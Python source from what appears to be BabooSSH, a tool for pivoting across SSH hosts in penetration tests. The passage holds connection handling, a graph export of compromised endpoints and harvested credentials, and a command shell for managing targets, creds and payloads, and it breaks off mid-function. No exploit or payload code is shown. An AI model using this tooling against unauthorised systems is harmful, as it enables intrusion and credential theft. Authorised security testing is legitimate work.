            print("\033[2;3m"+str(self)+"\033[22;23m > ", end="", flush=True)

        if gateway is None:
            path_src = None
        else:
            gateway.used_by_connections.append(self)
            if gateway.endpoint.host is not None:
                path_src = gateway.endpoint.host
            else:
                raise NoHostError
        path = Path(path_src, self.endpoint)
        path.save()
        self.save()

        if target:
            if self.endpoint.host is None:
                self.identify(conn)

        self.conn = conn

        return True

    def run(self, payload, current_workspace_directory, stmt, verbose=False):
        if not self.open(target=True, verbose=verbose):
            return False
        payload.run(self, current_workspace_directory, stmt)
        return True

    def close(self):
        if self.conn is None:
            return
        nb_tunnels = len(self.used_by_tunnels)
        if nb_tunnels != 0:
            print(str(nb_tunnels)+" tunnel(s) are open using this connection, please close tunnels first.")
            return
        for connection in self.used_by_connections:
            connection.close()
        self.conn.close()
        self.conn = None
        print("Closed "+str(self))

    def __str__(self):
        return str(self.user)+":"+str(self.creds)+"@"+str(self.endpoint)



import cmd2
from baboossh import Endpoint, Creds, User

class ExtStr(type):
    def __str__(self):
        return self.getKey()

class BaboosshExt(object,metaclass=ExtStr):
    @classmethod
    def getModType(cls):
        return "export"

    @classmethod
    def getKey(cls):
        return "comprograph"

    @classmethod
    def descr(cls):
        return "Export compromission graph as a dot file"

    @classmethod
    def buildParser(cls,parser):
        parser.add_argument("-f", "--findings", help="List findings",action="store_true")
        parser.add_argument('output',help='Output file path',completer=cmd2.Cmd.path_complete)

    @classmethod
    def run(cls,stmt,workspace):
        outfile = getattr(stmt,'output')
        findings = getattr(stmt,'findings',False)
        dotcode = 'digraph compromission_graph {\nnode [shape=plain,fontname="monospace"];\nrankdir="LR";\n'
        for endpoint in workspace.get_objects(endpoints=True,scope=True):
            label = "<table cellborder='1' cellspacing='0'><tr><td>"+str(endpoint)+"</td></tr>"
            if endpoint.host is not None:
                label = label + '<tr><td>'+str(endpoint.host)+'</td></tr>'
            if findings:
                foundEndpoints = Endpoint.find_all(found=endpoint,scope=True)
                foundUsers = User.find_all(found=endpoint,scope=True)
                foundCreds = Creds.find_all(found=endpoint,scope=True)

                if foundEndpoints or foundUsers or foundCreds:
                    label = label + "<tr><td><table cellborder='1' cellspacing='0'><tr><td colspan='2'>Findings</td></tr>"

                    if foundEndpoints :
                        label = label + '<tr><td>Endpoints</td><td>'
                        first = True
                        for foundEndpoint in foundEndpoints:
                            if not first:
                                label = label + '<br />'
                            else:
                                first = False
                            label = label + str(foundEndpoint)
                        label = label + '</td></tr>'

                    if foundUsers :
                        label = label + '<tr><td>Users</td><td>'
                        first = True
                        for user in foundUsers:
                            if not first:
                                label = label + '<br />'
                            else:
                                first = False
                            label = label + str(user)
                        label = label + '</td></tr>'
        
                    if foundCreds :
                        label = label + '<tr><td>Creds</td><td>'
                        first = True
                        for cred in foundCreds:
                            if not first:
                                label = label + '<br />'
                            else:
                                first = False
                            label = label + str(cred)
                        label = label + '</td></tr>'
                    label = label + "</table></td></tr>"
            label = label + "</table>"

            dotcode = dotcode + 'node_'+str(endpoint.id)+' [label=<'+label+'>]\n'
            if endpoint.found is None:
                dotcode = dotcode + '"local" -> "node_'+str(endpoint.id)+'"\n'
            else:
                dotcode = dotcode + '"node_'+str(endpoint.found.id)+'" -> "node_'+str(endpoint.id)+'"\n'
        dotcode = dotcode + '}'
        with open(outfile,"w") as f:
            f.write(dotcode)
        print("Export saved as "+outfile)
        return True
    



#!/usr/bin/env python3

"""BabooSSH interactive interface

This module contains the whole user interface for BabooSSH, extending
cmd2 and providing completion & command syntax help. It also loads the
extensions on startup.

Typical usage example:

    from baboossh.shell import Shell
    Shell().cmdloop()

"""

import os
import re
import argparse
import shutil
import cmd2
import tabulate
from baboossh.utils import WORKSPACES_DIR, BABOOSSH_VERSION
from baboossh.extensions import Extensions
from baboossh.workspace import Workspace

def yes_no(prompt, default=None, list_val=None):
    """Simple Yes/No prompt to ask questions

    Args:
        prompt (str): The question to ask
        default (bool): The default answer
        list_val ([]): A list of values to output with "l" key

    Returns:
        A `bool` with `True` for yes else `False`
    """
    if list_val is None:
        if default is None:
            choices = "[y, n]"
        elif default:
            choices = "[Y, n]"
        else:
            choices = "[y, N]"
    else:
        if default is None:
            choices = "[y, n, l, ?]"
        elif default:
            choices = "[Y, n, l, ?]"
        else:
            choices = "[y, N, l, ?]"
    answer = ""
    while answer not in ["y", "n"]:
        answer = input(prompt+" "+choices+" ").lower()
        if answer == "?":
            print(" y => Yes")
            print(" n => No")
            print(" l => List values")
            print(" ? => Show help")
        elif list_val is not None and answer == "l":
            for elt in list_val:
                print(" "+str(elt))
        elif answer == "" and default is not None:
            answer = "y" if default else "n"
    return answer == "y"


Extensions.load()

class Shell(cmd2.Cmd):
    """BabooSSH Shell interface

    This class extends cmd2.Cmd to build the user interface.

    Attributes:
        intro (str): The banner printed on program start
        prompt (str): The default prompt
        workspace (Workspace): The current open baboossh.Workspace
        debug (bool): Boolean for debug output
    """

    __CMD_CAT_OBJ = "Object management"
    __CMD_CAT_CON = "Connecting hosts"
    __CMD_CAT_WSP = "Workspace management"


#################################################################
###################          GETTERS          ###################
#################################################################

    def __get_option_creds(self):
        return [cmd2.CompletionItem("#"+str(creds.id), creds.obj.toList()) for creds in self.workspace.get_objects(creds=True, scope=True)]

    def __get_option_host(self):
        return [cmd2.CompletionItem(str(host.name), "; ".join(str(e) for e in host.endpoints)) for host in self.workspace.get_objects(hosts=True, scope=True)]

    def __get_arg_workspaces(self):
        return [name for name in os.listdir(WORKSPACES_DIR) if os.path.isdir(os.path.join(WORKSPACES_DIR, name))]

    def __get_option_gateway(self):
        return self.__get_host_or_local()

    def __get_option_user(self):
        return [cmd2.CompletionItem(str(user), str(user)) for user in self.workspace.get_objects(users=True, scope=True)]

    def __get_option_endpoint(self):
        return [cmd2.CompletionItem(str(endpoint), "" if endpoint.host == None else str(endpoint.host)) for endpoint in self.workspace.get_objects(endpoints=True, scope=True)]

    def __get_option_endpoint_tag(self):
        endpoints = [cmd2.CompletionItem(str(endpoint), "" if endpoint.host == None else str(endpoint.host)) for endpoint in self.workspace.get_objects(endpoints=True, scope=True)]
        tags = [cmd2.CompletionItem("!"+str(tag.name), "; ".join(str(e) for e in tag.endpoints)) for tag in self.workspace.get_objects(tags=True, scope=True)]
        return endpoints+tags

    def __get_option_payload(self):
        return Extensions.payloads.keys()

    def __get_option_connection(self):
        return [cmd2.CompletionItem(str(connection), "" if connection.endpoint.host == None else str(connection.endpoint.host)) for connection in self.workspace.get_objects(connections=True, scope=True)]

    def __get_search_fields_endpoint(self):
        return self.workspace.search_fields("Endpoint")

    def __get_search_fields_host(self):
        return self.workspace.search_fields("Host")

    def __get_open_tunnels(self):
        #TODO
        return self.workspace.get_objects(tunnels=True)

    def __get_run_targets(self):
        return self.__get_option_connection() + self.__get_option_host() + self.__get_option_endpoint()

    def __get_host_or_local(self):
        items = [cmd2.CompletionItem("local","BabooSSH host")]
        return items+[cmd2.CompletionItem(str(host.name), "; ".join(str(e) for e in host.endpoints)) for host in self.workspace.get_objects(hosts=True, scope=True)]

    def __get_endpoint_or_host(self):
        return self.__get_option_host() + self.__get_option_endpoint()

    def __get_tag(self):
        return [cmd2.CompletionItem(str(tag.name), "; ".join(str(e) for e in tag.endpoints)) for tag in self.workspace.get_objects(tags=True, scope=True)]

#################################################################
###################         WORKSPACE         ###################
#################################################################

    def __workspace_list(self, stmt):
        print("Existing workspaces :")
        workspaces = [name for name in os.listdir(WORKSPACES_DIR) if os.path.isdir(os.path.join(WORKSPACES_DIR, name))]
        for workspace in workspaces:
            if workspace == self.workspace.name:
                print(" -["+workspace+"]")
            else:
                print(" - "+workspace)

    def __workspace_add(self, stmt):
        name = vars(stmt)['name']
        #Check if name was given
        if re.match(r'^[\w_\.-]+$', name) is None:
            print('Invalid characters in workspace name. Allowed characters are letters, numbers and ._-')
            return
        #Check if workspace already exists
        if os.path.exists(os.path.join(WORKSPACES_DIR, name)):
            print("Workspace already exists")
            return
        try:
            new_workspace = Workspace.create(name)
        except (OSError, ValueError) as exc:
            print("Workspace creation failed: "+str(exc))
        else:
            self.workspace = new_workspace

    def __workspace_use(self, stmt):
        name = vars(stmt)['name']
        #Check if workspace already exists
        if not os.path.exists(os.path.join(WORKSPACES_DIR, name)):
            print("Workspace does not exist")
            return
        try:
            new_workspace = Workspace(name)
        except ValueError as exc:
            print("Workspace change failed: "+str(exc))
        else:
            self.workspace = new_workspace

    def __workspace_del(self, stmt):
        name = vars(stmt)['name']
        #Check if workspace already exists
        if not os.path.exists(os.path.join(WORKSPACES_DIR, name)):
            print("Workspace does not exist")
            return
        if self.workspace.name == name:
            print("Cannot delete current workspace, please change workspace first.")
            return
        if not yes_no("Are you sure you want to delete workspace "+name+"?", default=False):
            return
        shutil.rmtree(os.path.join(WORKSPACES_DIR, name))
        print("Workspace deleted !")

    __parser_wspace = argparse.ArgumentParser(prog="workspace")
    __subparser_wspace = __parser_wspace.add_subparsers(title='Actions', help='Available actions')
    __parser_wspace_list = __subparser_wspace.add_parser("list", help='List workspaces')
    __parser_wspace_add = __subparser_wspace.add_parser("add", help='Add a new workspace')
    __parser_wspace_add.add_argument('name', help='New workspace name')
    __parser_wspace_use = __subparser_wspace.add_parser("use", help='Change current workspace')
    __parser_wspace_use.add_argument('name', help='Name of workspace to use', choices_provider=__get_arg_workspaces)
    __parser_wspace_del = __subparser_wspace.add_parser("delete", help='Delete workspace')
    __parser_wspace_del.add_argument('name', help='Name of workspace to delete', choices_provider=__get_arg_workspaces)

    __parser_wspace_list.set_defaults(func=__workspace_list)
    __parser_wspace_add.set_defaults(func=__workspace_add)
    __parser_wspace_use.set_defaults(func=__workspace_use)
    __parser_wspace_del.set_defaults(func=__workspace_del)

    @cmd2.with_argparser(__parser_wspace)
    @cmd2.with_category(__CMD_CAT_WSP)
    def do_workspace(self, stmt: argparse.Namespace):
        '''Create, list, delete and use workspaces.

        Each workspace is a container for every object available in BabooSSH.
        Having several workspaces allows you to segregate various environments,
        keeping your findings and your loot organised.

        '''
        func = getattr(stmt, 'func', None)
        if func is not None:
            # Call whatever subcommand function was selected
            func(self, stmt)
        else:
            self.__workspace_list(stmt)

#################################################################
###################           HOSTS           ###################
#################################################################

    def __host_print(self, hosts):
        data = []
        for host in hosts:
            endpoints = ""
            for endpoint in host.endpoints:
                if endpoints == "":
                    endpoints = str(endpoint)
                else:
                    endpoints = endpoints + ", "+str(endpoint)
            scope = "o" if host.scope else ""
            data.append([scope, host.name, host.distance, endpoints])
        print(tabulate.tabulate(data, headers=["", "Name", "Dist", "Endpoints"]))

    def __host_list(self, stmt):
        print("Current hosts in workspace:")
        show_all = getattr(stmt, 'all', False)
        hosts = self.workspace.get_objects(hosts=True, scope=None if show_all else True)
        if not hosts:
            print("No hosts in current workspace")
            return
        self.__host_print(hosts)

    def __host_search(self, stmt):
        show_all = getattr(stmt, 'all', False)
        tag = getattr(stmt, 'tag', None)
        field = vars(stmt)['field']
        allowed_fields = self.__get_search_fields_host()
        if field not in allowed_fields:
            print("Invalid field specified, use one of "+str(allowed_fields)+".")
            return
        val = vars(stmt)['val']
        hosts = self.workspace.host_search(field, val, show_all, add_tag=tag)
        print("Search result for hosts:")
        if not hosts:
            print("No results")
            return
        self.__host_print(hosts)

    def __host_del(self, stmt):
        host = getattr(stmt, 'host', None)
        self.workspace.host_del(host)

    def __host_tag(self, stmt):
        host = vars(stmt)['host']
        tagname = vars(stmt)['tagname']
        self.workspace.host_tag(host, tagname)

    def __host_untag(self, stmt):
        host = vars(stmt)['host']
        tagname = vars(stmt)['tagname']
        self.workspace.host_untag(host, tagname)

    __parser_host = argparse.ArgumentParser(prog="host")
    __subparser_host = __parser_host.add_subparsers(title='Actions', help='Available actions')
    __parser_host_list = __subparser_host.add_parser("list", help='List hosts')
    __parser_host_list.add_argument("-a", "--all", help="Show out of scope objects", action="store_true")
    __parser_host_search = __subparser_host.add_parser("search", help='Search a host')
    __parser_host_search.add_argument('field', help='Field to search in', choices_provider=__get_search_fields_host)
    __parser_host_search.add_argument('val', help='Value to search')
    __parser_host_search.add_argument("-t", "--tag", help="Add tag to search results", choices_provider=__get_tag)
    __parser_host_del = __subparser_host.add_parser("delete", help='Delete host')
    __parser_host_del.add_argument('host', help='Host name', choices_provider=__get_option_host)
    __parser_host_tag = __subparser_host.add_parser("tag", help='Tag an host')
    __parser_host_tag.add_argument('host', help='Host', choices_provider=__get_option_host)
    __parser_host_tag.add_argument('tagname', help='The tag name to add', choices_provider=__get_tag)
    __parser_host_untag = __subparser_host.add_parser("untag", help='Tag an host')
    __parser_host_untag.add_argument('host', help='Host', choices_provider=__get_option_host)
    __parser_host_untag.add_argument('tagname', help='The tag name to add', choices_provider=__get_tag)

    __parser_host_list.set_defaults(func=__host_list)
    __parser_host_search.set_defaults(func=__host_search)
    __parser_host_del.set_defaults(func=__host_del)
    __parser_host_tag.set_defaults(func=__host_tag)
    __parser_host_untag.set_defaults(func=__host_untag)

    @cmd2.with_argparser(__parser_host)
    @cmd2.with_category(__CMD_CAT_OBJ)
    def do_host(self, stmt):
        '''Search, list and delete hosts.

        You can list or delete hosts, and use them as pivots to force using a
        specific path. Host addition is performed automatically when you
        successfully connect to an endpoint for the first time.
        '''
        func = getattr(stmt, 'func', None)
        if func is not None:
            # Call whatever subcommand function was selected
            func(self, stmt)
        else:
            self.__host_list(stmt)

#################################################################
###################         ENDPOINTS         ###################
#################################################################

    def __endpoint_print(self, endpoints):
        data = []
        for endpoint in endpoints:
            scope = "o" if endpoint.scope else ""
            conn = endpoint.connection
            if conn is None:
                conn = ""
            host = endpoint.host
            if host is None:
                host = ""
            if endpoint.reachable is None:
                reachable = "?"
            else:
                reachable = str(endpoint.reachable)
            if endpoint.distance is None:
                distance = ""
            else:
                distance = str(endpoint.distance)
            first = True
            taglist = ""
            for tag in endpoint.tags:
                taglist = taglist + ("!"+tag if first else ", !"+tag)
                first = False

            data.append([scope, endpoint, host, reachable, distance, conn, taglist])
        print(tabulate.tabulate(data, headers=["", "Endpoint", "Host", "Reachable", "Dist", "Working connection", "Tags"]))

    def __endpoint_list(self, stmt):
        print("Current endpoints in workspace:")
        show_all = getattr(stmt, 'all', False)
        reachable = getattr(stmt, 'reachable', None)
        conn = getattr(stmt, 'conn', None)
        endpoints = self.workspace.get_objects(endpoints=True, scope=None if show_all else True)
        if not endpoints:
            print("No endpoints in current workspace")
            return

        endpoint_list = []
        for endpoint in endpoints:
            if reachable is not None:
                flag_reachable = reachable == "true"
                if endpoint.reachable != flag_reachable:
                    continue
            if conn is not None:
                flag_conn = conn == "true"
                if (endpoint.connection is None) == flag_conn:
                    continue
            endpoint_list.append(endpoint)
        self.__endpoint_print(endpoint_list)

    def __endpoint_add(self, stmt):
        ip_add = vars(stmt)['ip']
        port = str(vars(stmt)['port'])
        try:
            self.workspace.endpoint_add(ip_add, port)
        except Exception as exc:
            print("Endpoint addition failed: "+str(exc))
        else:
            print("Endpoint "+ip_add+":"+port+" added.")

    def __endpoint_del(self, stmt):
        endpoint = vars(stmt)['endpoint']
        self.workspace.endpoint_del(endpoint)

    def __endpoint_tag(self, stmt):
        endpoint = vars(stmt)['endpoint']
        tagname = vars(stmt)['tagname']
        self.workspace.endpoint_tag(endpoint, tagname)

    def __endpoint_untag(self, stmt):
        endpoint = vars(stmt)['endpoint']
        tagname = vars(stmt)['tagname']
        self.workspace.endpoint_untag(endpoint, tagname)


    def __endpoint_search(self, stmt):
        show_all = getattr(stmt, 'all', False)
        tag = getattr(stmt, 'tag', None)
        field = vars(stmt)['field']
        allowed_fields = self.__get_search_fields_endpoint()
        if field not in allowed_fields:
            print("Invalid field specified, use one of "+str(allowed_fields)+".")
            return
        val = vars(stmt)['val']
        endpoints = self.workspace.endpoint_search(field, val, show_all, add_tag=tag)
        print("Search result for endpoints:")
        if not endpoints:
            print("No results")
            return
        self.__endpoint_print(endpoints)


    __parser_endpoint = argparse.ArgumentParser(prog="endpoint")
    __subparser_endpoint = __parser_endpoint.add_subparsers(title='Actions', help='Available actions')
    __parser_endpoint_list = __subparser_endpoint.add_parser("list", help='List endpoints')
    __parser_endpoint_list.add_argument("-a", "--all", help="Show out of scope objects", action="store_true")
    __parser_endpoint_list.add_argument("-r", "--reachable", help="Show only reachable endpoints", nargs='?', choices=["true", "false"], const="true")
    __parser_endpoint_list.add_argument("-c", "--conn", help="Show only endpoints with connection", nargs='?', choices=["true", "false"], const="true")
    __parser_endpoint_add = __subparser_endpoint.add_parser("add", help='Add a new endpoint')
    __parser_endpoint_add.add_argument('ip', help='New endpoint ip')
    __parser_endpoint_add.add_argument('port', help='New endpoint port', type=int, default=22, nargs='?')
    __parser_endpoint_search = __subparser_endpoint.add_parser("search", help='Search an endpoint')
    __parser_endpoint_search.add_argument("-a", "--all", help="Include out of scope elements in search", action="store_true")
    __parser_endpoint_search.add_argument('field', help='Field to search in', choices_provider=__get_search_fields_endpoint)
    __parser_endpoint_search.add_argument('val', help='Value to search')
    __parser_endpoint_search.add_argument("-t", "--tag", help="Add tag to search results", choices_provider=__get_tag)
    __parser_endpoint_del = __subparser_endpoint.add_parser("delete", help='Set target endpoint')
    __parser_endpoint_del.add_argument('endpoint', help='Endpoint', choices_provider=__get_option_endpoint_tag)
    __parser_endpoint_tag = __subparser_endpoint.add_parser("tag", help='Tag an endpoint')
    __parser_endpoint_tag.add_argument('endpoint', help='Endpoint', choices_provider=__get_option_endpoint)
    __parser_endpoint_tag.add_argument('tagname', help='The tag name to add', choices_provider=__get_tag)
    __parser_endpoint_untag = __subparser_endpoint.add_parser("untag", help='Tag an endpoint')
    __parser_endpoint_untag.add_argument('endpoint', help='Endpoint', choices_provider=__get_option_endpoint)
    __parser_endpoint_untag.add_argument('tagname', help='The tag name to add', choices_provider=__get_tag)

    __parser_endpoint_list.set_defaults(func=__endpoint_list)
    __parser_endpoint_add.set_defaults(func=__endpoint_add)
    __parser_endpoint_search.set_defaults(func=__endpoint_search)
    __parser_endpoint_del.set_defaults(func=__endpoint_del)
    __parser_endpoint_tag.set_defaults(func=__endpoint_tag)
    __parser_endpoint_untag.set_defaults(func=__endpoint_untag)

    @cmd2.with_argparser(__parser_endpoint)
    @cmd2.with_category(__CMD_CAT_OBJ)
    def do_endpoint(self, stmt):
        '''Create, list, search and delete endpoints.

        An endpoint is a couple of an IP and a port on which a SSH service
        should be running. Once added, an endpoint must be reached using "probe"
        and then connected using "connect".
        '''
        func = getattr(stmt, 'func', None)
        if func is not None:
            # Call whatever subcommand function was selected
            func(self, stmt)
        else:
            self.__endpoint_list(stmt)

#################################################################
###################           USERS           ###################
#################################################################

    def __user_list(self, stmt):
        print("Current users in workspace:")
        show_all = getattr(stmt, 'all', False)
        users = self.workspace.get_objects(users=True, scope=None if show_all else True)
        if not users:
            print("No users in current workspace")
            return
        data = []
        for user in users:
            scope = "o" if user.scope else ""
            data.append([scope, user])
        print(tabulate.tabulate(data, headers=["", "Username"]))

    def __user_add(self, stmt):
        name = vars(stmt)['name']
        try:
            self.workspace.user_add(name)
        except Exception as exc:
            print("User addition failed: "+str(exc))
        else:
            print("User "+name+" added.")

    def __user_del(self, stmt):
        name = vars(stmt)['name']
        self.workspace.user_del(name)

    __parser_user = argparse.ArgumentParser(prog="user")
    __subparser_user = __parser_user.add_subparsers(title='Actions', help='Available actions')
    __parser_user_list = __subparser_user.add_parser("list", help='List users')
    __parser_user_list.add_argument("-a", "--all", help="Show out of scope objects", action="store_true")
    __parser_user_add = __subparser_user.add_parser("add", help='Add a new user')
    __parser_user_add.add_argument('name', help='New user name')
    __parser_user_del = __subparser_user.add_parser("delete", help='Delete a user')
    __parser_user_del.add_argument('name', help='User name', choices_provider=__get_option_user)

    __parser_user_list.set_defaults(func=__user_list)
    __parser_user_add.set_defaults(func=__user_add)
    __parser_user_del.set_defaults(func=__user_del)

    @cmd2.with_argparser(__parser_user)
    @cmd2.with_category(__CMD_CAT_OBJ)
    def do_user(self, stmt):
        '''Create, list and delete users.

        A user is a username used to authenticate on an endpoint. Once a user
        is added to the workspace, it can be used with "set" and "connect".
        '''
        func = getattr(stmt, 'func', None)
        if func is not None:
            # Call whatever subcommand function was selected
            func(self, stmt)
        else:
            self.__user_list(stmt)

#################################################################
###################           CREDS           ###################
#################################################################

    def __creds_types(self, stmt):
        print("Supported credential types:")
        data = []
        for key in Extensions.auths:
            data.append([key, Extensions.auths[key].descr()])
        print(tabulate.tabulate(data, headers=["Key", "Description"]))

    def __creds_list(self, stmt):
        show_all = getattr(stmt, 'all', False)
        creds = self.workspace.get_objects(creds=True, scope=None if show_all else True)
        if not creds:
            print("No creds in current workspace")
            return
        data = []
        for cred in creds:
            scope = "o" if cred.scope else ""
            data.append([scope, "#"+str(cred.id), cred.obj.getKey(), cred.obj.toList()])
        print(tabulate.tabulate(data, headers=["", "ID", "Type", "Value"]))

    def __creds_show(self, stmt):
        creds_id = vars(stmt)['id']
        self.workspace.creds_show(creds_id)

    def __creds_edit(self, stmt):
        creds_id = vars(stmt)['id']
        self.workspace.creds_edit(creds_id)

    def __creds_del(self, stmt):
        creds_id = vars(stmt)['id']
        self.workspace.creds_del(creds_id)

    def __creds_add(self, stmt):
        creds_type = vars(stmt)['type']
        try:
            creds_id = self.workspace.creds_add(creds_type, stmt)
        except Exception as exc:
            print("Credentials addition failed: "+str(exc))
        else:
            print("Credentials #"+str(creds_id)+" added.")

    __parser_creds = argparse.ArgumentParser(prog="creds")
    __subparser_creds = __parser_creds.add_subparsers(title='Actions', help='Available actions')
    __parser_creds_list = __subparser_creds.add_parser("list", help='List saved credentials')
    __parser_creds_list.add_argument("-a", "--all", help="Show out of scope objects", action="store_true")
    __parser_creds_types = __subparser_creds.add_parser("types", help='List available credentials types')
    __parser_creds_show = __subparser_creds.add_parser("show", help='Show credentials details')
    __parser_creds_show.add_argument('id', help='Creds identifier', choices_provider=__get_option_creds)
    __parser_creds_edit = __subparser_creds.add_parser("edit", help='Edit credentials details')
    __parser_creds_edit.add_argument('id', help='Creds identifier', choices_provider=__get_option_creds)
    __parser_creds_add = __subparser_creds.add_parser("add", help='Add new credentials')
    __subparser_creds_add = __parser_creds_add.add_subparsers(title='Add creds', help='Available creds types')
    for __methodName in Extensions.auths:
        __method = Extensions.auths[__methodName]
        __parser_method = __subparser_creds_add.add_parser(__methodName, help=__method.descr())
        __parser_method.set_defaults(type=__methodName)
        __method.buildParser(__parser_method)
    __parser_creds_del = __subparser_creds.add_parser("delete", help='Delete credentials from workspace')
    __parser_creds_del.add_argument('id', help='Creds identifier', choices_provider=__get_option_creds)

    __parser_creds_list.set_defaults(func=__creds_list)
    __parser_creds_types.set_defaults(func=__creds_types)
    __parser_creds_show.set_defaults(func=__creds_show)
    __parser_creds_edit.set_defaults(func=__creds_edit)
    __parser_creds_add.set_defaults(func=__creds_add)
    __parser_creds_del.set_defaults(func=__creds_del)

    @cmd2.with_argparser(__parser_creds)
    @cmd2.with_category(__CMD_CAT_OBJ)
    def do_creds(self, stmt):
        '''Create, list, edit and delete credentials.

        Credentials are secrets used to authenticate. They can be of different
        types (see "creds types" to list supported types) and are used with "set"
        and "connect".

        The creds object provides a unified interface for the underlying types.
        '''
        func = getattr(stmt, 'func', None)
        if func is not None:
            # Call whatever subcommand function was selected
            func(self, stmt)
        else:
            self.__creds_list(stmt)

#################################################################
###################          PAYLOADS         ###################
#################################################################

    def __payload_list(self, stmt):
        print("Available payloads:")
        data = []
        for key in Extensions.payloads:
            data.append([key, Extensions.payloads[key].descr()])
        print(tabulate.tabulate(data, headers=["Key", "Description"]))

    __parser_payload = argparse.ArgumentParser(prog="payload")
    __subparser_payload = __parser_payload.add_subparsers(title='Actions', help='Available actions')
    __parser_payload_list = __subparser_payload.add_parser("list", help='List payloads')

    __parser_payload_list.set_defaults(func=__payload_list)

    @cmd2.with_argparser(__parser_payload)
    @cmd2.with_category(__CMD_CAT_WSP)
    def do_payload(self, stmt):
        '''List available payloads'''
        func = getattr(stmt, 'func', None)
        if func is not None:
            # Call whatever subcommand function was selected
            func(self, stmt)
        else:
            self.__payload_list(None)

#################################################################
###################        CONNECTIONS        ###################
#################################################################

    def __connection_list(self, stmt):
        print("Available connections:")
        show_all = getattr(stmt, 'all', False)
        connections = self.workspace.get_objects(connections=True, scope=None if show_all else True)
        if not connections:
            print("No connections in current workspace")
            return True
        data = []
        for connection in connections:
            if not show_all:
                if not connection.scope:
                    continue
            data.append([connection.endpoint, connection.user, connection.creds, "o" if connection.conn is not None else ""])
        print(tabulate.tabulate(data, headers=["Endpoint", "User", "Creds", "Open"]))
        return True

    def __connection_close(self, stmt):
        connection = getattr(stmt, "connection", None)
        return self.workspace.connection_close(connection)


    def __connection_del(self, stmt):
        connection = getattr(stmt, "connection", None)
        return self.workspace.connection_del(connection)

    __parser_connection = argparse.ArgumentParser(prog="connection")
    __subparser_connection = __parser_connection.add_subparsers(title='Actions', help='Available actions')
    __parser_connection_list = __subparser_connection.add_parser("list", help='List connections')
    __parser_connection_list.add_argument("-a", "--all", help="Show out of scope objects", action="store_true")
    __parser_connection_close = __subparser_connection.add_parser("close", help='Close connection')
    __parser_connection_close.add_argument('connection', help='Connection string', nargs="?", choices_provider=__get_option_connection)
    __parser_connection_del = __subparser_connection.add_parser("delete", help='Delete connection')
    __parser_connection_del.add_argument('connection', help='Connection string', choices_provider=__get_option_connection)

    __parser_connection_list.set_defaults(func=__connection_list)
    __parser_connection_close.set_defaults(func=__connection_close)
    __parser_connection_del.set_defaults(func=__connection_del)

    @cmd2.with_argparser(__parser_connection)
    @cmd2.with_category(__CMD_CAT_OBJ)
    def do_connection(self, stmt):
        '''List and delete working connections.

        A connection object is saved whenever a user and a creds object work on
        an endpoint, as tested by the "connect" command. Once the object is
        created, it can be used with "set" and "run" to run payloads.
        '''
        func = getattr(stmt, 'func', None)
        if func is not None:
            # Call whatever subcommand function was selected
            func(self, stmt)
        else:
            self.__connection_list(stmt)


#################################################################
###################          OPTIONS          ###################
#################################################################

    def __options_list(self):
        print("Current options:")
        for key, val in self.workspace.options.items():
            print("    - "+key+": "+str(val))

    __parser_option = argparse.ArgumentParser(prog="option")
    __subparser_option = __parser_option.add_subparsers(title='Actions', help='Available actions')
    __parser_option_list = __subparser_option.add_parser("list", help='List options')
    __parser_option_user = __subparser_option.add_parser("user", help='Set target user')
    __parser_option_user.add_argument('username', help='User name', nargs="?", choices_provider=__get_option_user)
    __parser_option_creds = __subparser_option.add_parser("creds", help='Set target creds')
    __parser_option_creds.add_argument('id', help='Creds ID', nargs="?", choices_provider=__get_option_creds)
    __parser_option_endpoint = __subparser_option.add_parser("endpoint", help='Set target endpoint')
    __parser_option_endpoint.add_argument('endpoint', nargs="?", help='Endpoint', choices_provider=__get_option_endpoint_tag)
    __parser_option_payload = __subparser_option.add_parser("payload", help='Set target payload')
    __parser_option_payload.add_argument('payload', nargs="?", help='Payload name', choices_provider=__get_option_payload)
    __parser_option_connection = __subparser_option.add_parser("connection", help='Set target connection')
    __parser_option_connection.add_argument('connection', nargs="?", help='Connection string', choices_provider=__get_option_connection)
    __parser_option_params = __subparser_option.add_parser("params", help='Set payload params')
    __parser_option_params.add_argument('params', nargs="*", help='Payload params')

    __parser_option_list.set_defaults(option="list")
    __parser_option_user.set_defaults(option="user")
    __parser_option_creds.set_defaults(option="creds")
    __parser_option_endpoint.set_defaults(option="endpoint")
    __parser_option_payload.set_defaults(option="payload")
    __parser_option_connection.set_defaults(option="connection")
    __parser_option_params.set_defaults(option="params")

    @cmd2.with_argparser(__parser_option)
    @cmd2.with_category(__CMD_CAT_WSP)
    def do_set(self, stmt):
        '''Set the workspace active options.

        Once set, the options will be used when running "probe", "connect" and
        "run" without parameters to define which connections to target and
        which payload to run with which options.
        '''
        if 'option' not in vars(stmt):
            self.__options_list()
            return
        option = vars(stmt)['option']
        if option is not None:
            if option == "list":
                self.__options_list()
                return
            if option == "user":
                value = vars(stmt)['username']
            elif option == "creds":
                value = vars(stmt)['id']
            elif option == "endpoint":
                value = vars(stmt)['endpoint']
            elif option == "payload":
                value = vars(stmt)['payload']
            elif option == "connection":
                value = vars(stmt)['connection']
            elif option == "params":
                value = " ".join(vars(stmt)['params'])
            try:
                self.workspace.set_option(option, value)
            except:
                print("Invalid value for "+option)

        else:
            self.__options_list()

#################################################################
###################           TAGS            ###################
#################################################################

    def __tag_list(self, stmt):
        print("Current tags in workspace:")
        tags = self.workspace.get_objects(tags=True)
        if not tags:
            print("No tags in current workspace")
            return
        data = []
        for tag in tags:
            data.append([tag])
        print(tabulate.tabulate(data, headers=["Tag name"]))

    def __tag_show(self, stmt):
        name = vars(stmt)['tagname']
        self.workspace.tag_show(name)

    def __tag_del(self, stmt):
        name = vars(stmt)['tagname']
        self.workspace.tag_del(name)

    __parser_tag = argparse.ArgumentParser(prog="tag")
    __subparser_tag = __parser_tag.add_subparsers(title='Actions', help='Available actions')
    __parser_tag_list = __subparser_tag.add_parser("list", help='List tags')
    __parser_tag_show = __subparser_tag.add_parser("show", help='Show endpoints with tag')
    __parser_tag_show.add_argument('tagname', help='Tag name', choices_provider=__get_tag)
    __parser_tag_del = __subparser_tag.add_parser("delete", help='Delete tag')
    __parser_tag_del.add_argument('tagname', help='Tag name', choices_provider=__get_tag)

    __parser_tag_list.set_defaults(func=__tag_list)
    __parser_tag_show.set_defaults(func=__tag_show)
    __parser_tag_del.set_defaults(func=__tag_del)

    @cmd2.with_argparser(__parser_tag)
    @cmd2.with_category(__CMD_CAT_OBJ)
    def do_tag(self, stmt):
        '''Manage tags'''
        func = getattr(stmt, 'func', None)
        if func is not None:
            # Call whatever subcommand function was selected
            func(self, stmt)
        else:
            self.__tag_list(stmt)


#################################################################
###################           PATHS           ###################
#################################################################

    def __path_list(self, stmt):
        print("Current paths in workspace:")
